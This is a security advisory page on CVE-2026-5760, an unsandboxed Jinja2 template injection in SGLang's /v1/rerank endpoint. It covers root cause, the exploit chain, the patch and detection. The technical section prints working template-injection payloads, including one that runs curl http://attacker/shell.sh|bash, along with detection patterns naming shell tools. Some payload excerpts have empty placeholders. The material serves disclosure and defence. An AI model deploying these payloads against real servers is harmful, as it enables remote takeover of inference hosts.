CVE-2026-5760: SGLang Rerank Endpoint RCE via Unsandboxed Jinja2

SGLang's /v1/rerank endpoint renders Jinja2 chat templates without sandboxing, allowing RCE via malicious tokenizer.chat_template in a loaded model file. CVSS 9.8.

// PLAIN ENGLISH VERSION

# The Hidden Danger in AI Model Files

Imagine you hired a translator who comes with their own instruction manual. If someone sneaks malicious commands into that manual before it reaches you, the translator could do whatever they want on your computer — steal files, install malware, hold your data for ransom. That's essentially what's happening here.

SGLang is a popular tool that helps run AI models on servers. It has a feature called the reranking endpoint that processes requests from users. The problem is in how it loads AI models: it trusts the instruction files that come bundled with them without checking if they've been tampered with.

An attacker can create a fake or modified AI model file and trick a server into loading it. Hidden inside that file is malicious code disguised as template instructions. When the server loads the model, it runs that hidden code with full access to the system. The attacker now controls everything.

This is particularly dangerous for companies running AI services. If you're offering an API to customers, or using an AI model you downloaded from an untrusted source, you're at risk. Small AI startups and research labs are especially vulnerable because they might not have security teams checking every model they use.

What should you do? First, only download AI models from official sources — the creator's website or established repositories. Second, if you run SGLang, update it immediately when patches arrive. Third, don't load random models people send you, just like you wouldn't run random software from strangers. Think of it like verifying food comes from a trusted restaurant before eating it.

Want the full technical analysis? Click "Technical" above.

▶ Attack flow — CVE-2026-5760 · Remote Code Execution

Vulnerability Overview

CVE-2026-5760 is a critical remote code execution vulnerability in SGLang's reranking inference endpoint. When SGLang loads a model whose tokenizer_config.json contains a malicious chat_template value, the template is rendered server-side using a completely unsandboxed jinja2.Environment(). Any attacker who can cause a target SGLang server to load a model they control — via Hugging Face Hub, a shared model store, or a direct model path argument — can achieve full OS-level code execution on the inference host.

This is not a theoretical gadget chain. It mirrors the exact class of template injection exploited in prior ML-serving advisories (Hugging Face Transformers, llama.cpp GGUF metadata). The difference here is that the injection surface is reachable remotely through the HTTP API with no authentication required in default SGLang deployments.

Root cause: sglang/srt/managers/tokenizer_manager.py calls jinja2.Environment().from_string(chat_template) on attacker-controlled template content loaded from a model file, with no SandboxedEnvironment and no AST restriction, allowing full Python execution through Jinja2's {{ ''.__class__.__mro__[1].__subclasses__() }} MRO traversal.

Affected Component

The vulnerable path is confined to the chat template rendering pipeline inside SGLang's tokenizer manager:

sglang/
├── srt/
│   ├── managers/
│   │   └── tokenizer_manager.py   ← vulnerable: Environment().from_string()
│   ├── server/
│   │   └── router.py              ← /v1/rerank route registration
│   └── hf_transformers_utils.py   ← loads tokenizer_config.json chat_template

The /v1/rerank endpoint triggers tokenizer application to format input documents, which invokes the chat template renderer. The same code path is reachable via /v1/chat/completions, but reranking was identified as the primary attack surface because it processes bulk document lists — maximizing template render calls per request.

Root Cause Analysis

The vulnerable function constructs a Jinja2 Environment with default settings and passes the model-supplied template string directly to from_string():


# sglang/srt/managers/tokenizer_manager.py (vulnerable)

import jinja2

def _get_jinja_template(self, tokenizer):
    chat_template = tokenizer.chat_template  # loaded from tokenizer_config.json
    if chat_template is None:
        return None

    # BUG: stock jinja2.Environment() — no sandbox, no extension restrictions,
    #      no undefined policy. Attacker-controlled string rendered with full
    #      Python object access via MRO traversal.
    env = jinja2.Environment()
    return env.from_string(chat_template)   # <-- unsandboxed render

def apply_chat_template(self, messages, tokenizer):
    template = self._get_jinja_template(tokenizer)
    # template.render() executes arbitrary Python if chat_template is malicious
    return template.render(
        messages=messages,
        add_generation_prompt=True,
        eos_token=tokenizer.eos_token,
        bos_token=tokenizer.bos_token,
    )

The jinja2.Environment() constructor, when called with no arguments, creates an environment where template expressions have full access to Python's object model. There is no call to jinja2.sandbox.SandboxedEnvironment, no ImmutableSandboxedEnvironment, and no template.module restriction. The template string originates from tokenizer_config.json on disk — a file shipped inside every HuggingFace model repository.

The attacker-controlled tokenizer_config.json payload that triggers execution:


# malicious tokenizer_config.json excerpt
{
  "tokenizer_class": "PreTrainedTokenizerFast",
  "chat_template": "{{ ''.__class__.__mro__[1].__subclasses__()[].__init__.__globals__['__builtins__']['__import__']('os').system('id > /tmp/pwned') }}"
}

Where <N> is the index of a suitable subclass exposing __globals__ — typically warnings.catch_warnings or subprocess.Popen depending on the Python environment. A more robust payload uses __import__('subprocess').check_output(...) through the builtins dict directly:


# robust execution payload (works across CPython 3.8–3.12)
PAYLOAD = (
    "{%- set ns = namespace(f=''.__class__.__mro__[1].__subclasses__()) -%}"
    "{%- for c in ns.f -%}"
    "  {%- if c.__name__ == 'catch_warnings' -%}"
    "    {%- set x = c.__init__.__globals__ -%}"
    "    {%- set _ = x['linecache'].__dict__['os'].system('curl http://attacker/shell.sh|bash') -%}"
    "  {%- endif -%}"
    "{%- endfor -%}"
    "TEMPLATE_OUTPUT"
)

Exploitation Mechanics


EXPLOIT CHAIN:
1. Attacker publishes malicious model to HuggingFace Hub (or serves via --model-path)
   └─ tokenizer_config.json contains weaponized chat_template payload

2. SGLang operator loads model:
   $ python -m sglang.launch_server --model attacker/malicious-reranker --port 30000

3. TokenizerManager.from_pretrained() reads tokenizer_config.json
   └─ self.tokenizer.chat_template = ""

4. Attacker sends HTTP POST to /v1/rerank:
   POST /v1/rerank HTTP/1.1
   Host: victim:30000
   Content-Type: application/json

   {
     "model": "attacker/malicious-reranker",
     "query": "test",
     "documents": ["doc1", "doc2"]
   }

5. Server calls apply_chat_template() to format each document
   └─ _get_jinja_template() constructs unsandboxed jinja2.Environment()
   └─ env.from_string(chat_template) compiles malicious template AST

6. template.render(messages=[...]) executes payload
   └─ MRO traversal resolves catch_warnings.__init__.__globals__
   └─ os.system() / subprocess called with attacker command

7. OS-level RCE achieved as inference server process user (often root in containers)
   └─ GPU host compromised; lateral movement to training infra possible

No authentication bypass is required. Default SGLang server deployments bind on 0.0.0.0:30000 with no API key enforcement. Any network-reachable client can POST to /v1/rerank.

Memory Layout

This is not a memory corruption class vulnerability — the primitive is logic-level template injection. The relevant "memory" is the Python object graph traversed during template.render(). The MRO walk that exposes os:


PYTHON OBJECT GRAPH TRAVERSAL DURING RENDER:

str.__class__                → 
  .__mro__[1]               → 
    .__subclasses__()       → [, , ..., , ...]
                                                                              ^
                                                          index varies by Python version/imports
                                                          enumerate at exploit time

catch_warnings
  .__init__                 → 
    .__globals__            → {'__name__': 'warnings', 'linecache': , ...}
      ['linecache']
        .__dict__['os']     →   ← PIVOT POINT
          .system(cmd)      → executes shell command

JINJA2 ENVIRONMENT STATE (unsandboxed):
  env.sandbox              = None          ← no sandbox installed
  env.undefined            = Undefined     ← default, no restriction
  env.keep_trailing_newline = False
  env.globals              = {'range': ..., 'lipsum': ..., 'dict': ...}
  env.filters              = { ... all default filters ... }
  env.tests                = { ... }
  ← getattr() calls on arbitrary Python objects: UNRESTRICTED

Patch Analysis

The correct fix is to replace jinja2.Environment() with jinja2.sandbox.SandboxedEnvironment(), which wraps attribute access through SandboxedEnvironment.getattr() and blocks MRO traversal, dunder access, and __globals__ exposure. The Hugging Face transformers library patched an identical issue in GHSA-g4xx-wp89-q2jq.


# BEFORE (vulnerable — tokenizer_manager.py):
import jinja2

def _get_jinja_template(self, tokenizer):
    chat_template = tokenizer.chat_template
    if chat_template is None:
        return None
    env = jinja2.Environment()              # ← unsandboxed
    return env.from_string(chat_template)


# AFTER (patched):
import jinja2
import jinja2.sandbox

def _get_jinja_template(self, tokenizer):
    chat_template = tokenizer.chat_template
    if chat_template is None:
        return None
    env = jinja2.sandbox.SandboxedEnvironment()   # ← sandboxed
    # additionally restrict undefined access:
    env.undefined = jinja2.StrictUndefined
    return env.from_string(chat_template)

SandboxedEnvironment intercepts all attribute and item access through is_safe_attribute(), which blocks:


# jinja2/sandbox.py — what SandboxedEnvironment blocks:
UNSAFE_GENERATOR_ATTRIBUTES = {'gi_frame', 'gi_code'}
UNSAFE_COROUTINE_ATTRIBUTES = {'cr_frame', 'cr_code'}
UNSAFE_ASYNC_GENERATOR_ATTRIBUTES = {'ag_frame', 'ag_code'}

def is_unsafe_attribute(obj, attr):
    # blocks: __class__, __mro__, __subclasses__, __globals__,
    #         __builtins__, __import__, func_globals
    if attr in UNSAFE_GENERATOR_ATTRIBUTES: return True
    if attr.startswith('__') and attr.endswith('__'): return True
    ...

An additional hardening measure — validating chat_template against a restricted AST node allowlist before rendering — should be applied as defense-in-depth, given the history of sandbox escapes in Jinja2 itself.

Detection and Indicators

Detection requires visibility into both the model loading event and the template content:


IOCs / DETECTION POINTS:

1. tokenizer_config.json content:
   YARA-style: strings containing .__class__.__mro__ | __subclasses__ | __globals__
   │           | __builtins__ | __import__ | linecache | catch_warnings

2. Process execution anomalies:
   Parent: python (sglang server PID)
   Child:  sh -c "..." | curl | wget | bash
   ← unexpected child process from inference server

3. HTTP access logs:
   POST /v1/rerank  with 4xx NOT appearing → payload rendered successfully
   POST /v1/chat/completions with unusual document-structured messages

4. Filesystem:
   /tmp/pwned, /tmp/*.sh created by inference server UID

5. Network:
   Outbound connections from GPU host to non-model-registry IPs
   originating from the Python inference process

On Kubernetes-deployed SGLang, enable Falco rule: spawned_process where parent comm = python3 and proc.name in (sh, bash, curl, wget).

Remediation

Immediate: Replace all jinja2.Environment() instantiations in the SGLang tokenizer pipeline with jinja2.sandbox.SandboxedEnvironment(). Audit hf_transformers_utils.py and any other path that calls from_string() on model-supplied content.

Short-term:

Validate chat_template against an AST allowlist (permit only For, If, Output, Filter nodes; reject any Getattr chain longer than depth 2).
Run SGLang inference servers as a non-root, no-shell UID with seccomp profiles blocking execve and fork.
Gate model loading behind an operator allowlist — only load models from verified, pinned SHA256 revisions.

Long-term: SGLang should implement a model trust boundary analogous to trust_remote_code=False in HuggingFace Transformers, requiring explicit operator opt-in for any model-provided executable content including chat templates.

The proof-of-concept published by Stuub demonstrates full shell execution against SGLang ≤ 0.5.9. Treat any unpatched SGLang deployment accessible from untrusted networks as fully compromised if it has loaded external models.

CVE-2026-5760: SGLang Rerank Endpoint RCE via Unsandboxed Jinja2

Vulnerability Overview

Affected Component

Root Cause Analysis

Exploitation Mechanics

Memory Layout

Patch Analysis

Detection and Indicators

Remediation

CVE-2026-34645: Adobe Commerce Incorrect Authorization Leads to Unauthenticated Write

CVE-2026-23827: Heap Overflow in AOS Network Management Service Enables Unauthenticated RCE

CVE-2026-34259: OS Command Injection in SAP Forecasting & Replenishment

You've read 2 free articles this session.